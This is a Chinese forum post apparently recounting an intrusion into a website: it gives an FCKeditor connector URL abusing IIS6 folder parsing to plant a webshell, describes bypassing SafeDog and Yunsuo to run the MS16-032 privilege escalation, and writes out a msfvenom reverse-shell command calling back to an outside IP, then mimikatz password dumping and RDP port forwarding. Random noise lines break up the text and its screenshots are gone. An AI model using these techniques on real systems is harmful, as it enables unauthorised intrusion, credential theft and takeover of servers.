找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2139|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 k( U, z" |# j+ ~1 a

6 F9 Y6 ?( F0 L0 R0 E; v0 l0 }* K% \: v3 ?) ^0 }( h6 [9 S7 a1 F* X; v- E: u. j0 m0 [ Z; W) m' M0 n( h6 F% U5 D6 I8 d* e( ^/ s- A- _( |( J/ f# u1 S. C4 Q) f
! x! F9 U! P6 u7 _9 @

2 I+ U+ n5 s- ~! X# n9 G$ p3 R
# L! r& h) e. \% Z% E
一、 利用getwebshell
0 a: T) u0 N! ?# D6 l6 {" a
- {( C" [' y0 P& p" i; m
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
2 C8 N+ W5 h! A' H" e
8 y, i x# }6 r: N( E$ `7 _9 M3 \ 222.png
% n* K/ u5 B% L9 }/ X
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
: W" T1 w/ I* L) `3 p, p- P7 l333.png
_5 u) L) _' Q8 M O
下面我们构造一个asp目录,如: 3 j3 g& T5 d- d( Y9 d, I; Z* ^

" y9 P$ A4 g$ T# ~

! O- A& I3 L# D) F2 A http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 : t1 v Q. d" m+ U& }: W) E

' b, D8 i: q, V

& e5 l& j( n& Q# a7 l 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
1 |" ~# o- q/ b6 P
9 I6 m) F8 F7 e; y2 ^1 u
一、 绕过安全狗云锁提权并且加账号
4 H0 y, c3 L# U! W6 U) R444.png
' I9 O5 G. w% l$ `4 I. r- l6 |
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
s& A" ~3 t' J% J$ ~
4 v2 C* |! o P# Z; w
如图:
2 k+ ^; J$ T6 }; Z555.png
9 o. E- m: O2 B3 z- O1 L+ T/ U
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
; h# d2 M g5 Z+ M3 \6 Z$ ]
/ |! Z! x; U9 \; q
一、 利用metasploit
7 `- a8 j: X* l, K# M$ r6 j
, x- ~% P G ]# T) _, j
首先用pentestbox生成一个64位的payload如下命令
u4 F; h6 i. m7 L
! T+ }+ W6 I$ d& t( rmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
0 \+ i. m6 o2 ~& b& W
9 s# w, x0 _$ I- i3 ^7 h
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
0 ^3 E& H1 _0 `4 X% a( _% @ 11.png
% I, p; S7 K5 O1 \! T
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
/ a `% p8 g8 g! R7 Y 13.png
% a+ U- V" q: F) B
下面我们来做一个监听如下命令:
( T$ A2 ~& W* C& q8 F- S3 E
0 b- C* N/ K) g6 X2 {portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
, \+ p0 ^& f6 h: |0 n) n18.png
( q4 A3 P( X' {; |

1 _0 B' h, G1 |! s
4 k& ^' f/ u: J! Y7 S" Q

! X4 `' e4 B- m0 Q0 _4 x6 `* H4 ^

& g- H0 Y8 V* i# X! o2 [
" \+ Q( n2 F) |5 r; n( D" d1 l" P
$ o4 F2 m8 T% ?: L1 ^
5 o9 z$ e- o1 }/ O4 @* a" |

: b/ y* c/ A1 B" g+ J
7 T, p$ T; Q8 ~: ~8 ]; T/ m+ r: \ 6 O& E4 \" X2 g! j- B) ?: d

0 Y; u! i; G7 c/ h
3 c6 D6 W& q% w1 w3 ]% r

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表